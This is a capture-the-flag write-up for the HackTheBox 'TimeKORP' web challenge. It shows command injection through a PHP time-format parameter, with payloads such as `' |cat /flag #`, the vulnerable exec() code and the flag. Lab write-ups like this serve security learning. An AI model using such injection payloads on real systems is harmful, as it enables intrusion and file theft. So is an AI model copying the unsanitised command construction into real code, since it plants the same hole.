Rating:
# TimeKORP
## Video Walkthrough
[](https://www.youtube.com/watch?v=-vhl8ixthO4?t=99 "HackTheBox Cyber Apocalypse '24: Time KORP (web)")
## Description
> TBD
## Solution
First things first; download the source and run the local docker instance for easy/fast debugging.
It's also a good idea to check the site functionality before reviewing the source code so that things fall into place more easily.
The site displays the time (`http://127.0.0.1:1337/?format=%H:%M:%S`) or date (`http://127.0.0.1:1337/?format=%Y-%m-%d`).
Opting for the lazy route, I check the burp scanner and find some interesting results. The first is XSS (reflected), presumably not much use as there was no admin bot to submit a URL to. The second is command injection!
Here's the URL-decoded [PoC](http://127.0.0.1:1337/?format=%25H%3a%25M%3a%25S%7cecho%20kefbjki4ag%20d6tyxfigki%7c%7ca%20%23'%20%7cecho%20kefbjki4ag%20d6tyxfigki%7c%7ca%20%23%7c%22%20%7cecho%20kefbjki4ag%20d6tyxfigki%7c%7ca%20%23) from burp:
```
/?format=%H:%M:%S|echo kefbjki4ag d6tyxfigki||a #' |echo kefbjki4ag d6tyxfigki||a #|" |echo kefbjki4ag d6tyxfigki||a #
```
The result indicates that the `echo kefbjki4ag d6tyxfigki` command did indeed execute.
```html
kefbjki4ag d6tyxfigki<span>.</span>
```
The payload syntax/length is a little confusing so I keep removing elements and re-testing to ensure the command still executes. The attack can be simplified to:
```
/?format=%H:%M:%S' |ls #
```
If we [URL-encode it](http://127.0.0.1:1337/?format=%25H%3a%25M%3a%25S'+|ls+%23) it lists the `views` directory. If we look around for a while we might not see the flag. Let's just check the source code and see the Dockerfile has the following line.
```dockerfile
# Copy flag
COPY flag /flag
```
Therefore, we can print the flag with [this payload](http://127.0.0.1:1337/?format=%25H%3a%25M%3a%25S'+|cat+/flag+%23) to retrieve the flag.
```
/?format=%H:%M:%S' |cat /flag #
```
We've already solved the challenge but why not review the vulnerable source code. Notice `TimeController.php` processes our vulnerable GET parameter (`format`).
```php
view('index', ['time' => $time->getTime()]);
}
}
```
It passes our user input (bad) to the `TimeModel.php` constructor which then executes the command.
```php
command = "date '+" . $format . "' 2>&1;;
}
public function getTime()
{
$time = exec($this->command);
$res = isset($time) ? $time : '?';
return $res;
}
}
```
So, assuming we submit `format=%H:%M:%S' |cat /flag #`, the `command` property of the object will be:
```bash
date '%H:%M:%S'' |cat /flag # 2>&1
```
Due to us closing off the string and inserting a pipe character, we were able to inject a malicious command! Crucially, we also needed to add a hash character afterwards, to prevent the output from being redirected.
Flag: `HTB{t1m3_f0r_th3_ult1m4t3_pwn4g3}`
